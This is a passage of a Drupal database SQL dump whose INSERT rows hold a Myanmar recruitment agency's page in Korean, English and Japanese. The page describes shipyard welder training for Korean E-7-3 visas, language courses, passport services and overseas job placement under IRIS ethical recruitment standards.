style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사람들을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기본</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">과정과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요하는 &nbsp; &nbsp; &nbsp; &nbsp; 경우에&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">컴퓨터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">많은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">과정들과 연결하고 취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를 하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; 7. 상기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\">&nbsp; </span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">IRIS(International Recruitment Integrity System)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">윤리적</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">채용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공정한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노동</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관행 &nbsp; &nbsp; &nbsp; 의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">마련하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공합니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 24, 184, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 184, 'ja', 0, '<p class=\"MsoNormal\">1.&nbsp;<span style=\"mso-spacerun:yes;\"> </span><span lang=\"JA\">ニューコメットトレンディグエイジェンシーでは韓国の造船所で</span>E 7-3 Visa<span lang=\"JA\">で働きたいミャンマー全国から民族 &nbsp; &nbsp; &nbsp;問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介 &nbsp; &nbsp; &nbsp;をしております。</span><o:p></o:p></p><p class=\"MsoNormal\">2. <span lang=\"JA\">海外に勤める際使えるそれぞれの国の言葉が勉強できる学校も開いております。</span>(<span lang=\"JA\">現在日本語学校、韓国語学校</span>)<o:p></o:p></p><p class=\"MsoNormal\">3 .<span lang=\"JA\">パスポート作成サービス</span><o:p></o:p></p><p class=\"MsoNormal\">4. <span lang=\"JA\">日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp; &nbsp; &nbsp; &nbsp;取り込んでおります。</span><o:p></o:p></p><p>5.<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT,<span style=\"mso-spacerun:yes;\">&nbsp;</span>NAT-TEST, TOP-J)<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">の</span>N3,N2<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">以上の合格者達にはワークビザである</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">通訳、翻訳</span><o:p></o:p></p><p>• IT<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">事業</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">エンジニアに関する事業</span><span style=\"mso-spacerun:yes;\">&nbsp;</span>(Civil,Mechanical,EP,EC,Auto Card<span style=\"font-family:&quot;MS Gothic&quot;;mso-bidi-font-family:&quot;MS Gothic&quot;;\">など</span>)<o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">介護関係</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;mso-fareast-language:JA;\" lang=\"JA\">実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">車修理関係</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">工業関係</span><o:p></o:p></p><p>• &nbsp;<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">建築業関係</span><o:p></o:p></p><p>• &nbsp;<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">食品関係</span><o:p></o:p></p><p>• &nbsp;<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">レストラン</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">ホテル関係</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">衣類関係</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">農業関係</span><o:p></o:p></p><p>&nbsp;•<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">漁業関係の工場</span><o:p></o:p></p><p>&nbsp;•<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">介護関係&nbsp;</span><span style=\"font-family:&quot;MS Mincho&quot;;font-size:9.5pt;mso-bidi-font-family:&quot;MS Mincho&quot;;mso-bidi-font-size:10.0pt;\">{Training Visa)</span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\">6.<span lang=\"JA\">ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp; &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビ &nbsp; &nbsp; &nbsp; ースをしております。</span><o:p></o:p></p><p><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">7. &nbsp;</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">上記のサービスを</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">International Recruitment Integrity System(IRIS)</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">が定めた</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">Ethical Recruitment and Fair Labour Practices</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">に &nbsp; &nbsp; &nbsp;合った基準で管理しております。</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 184, 'ko', 0, '<ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 한국 조선소에서</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> E-7-3 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접공</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">방문에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(PJ)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 외국에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일할 때 직장에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어려움을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">겪지</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">않도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직장에 사용하는 기본</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국어</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본어</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영어 수업들을 교육 시킴</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 해외</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">방문에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span 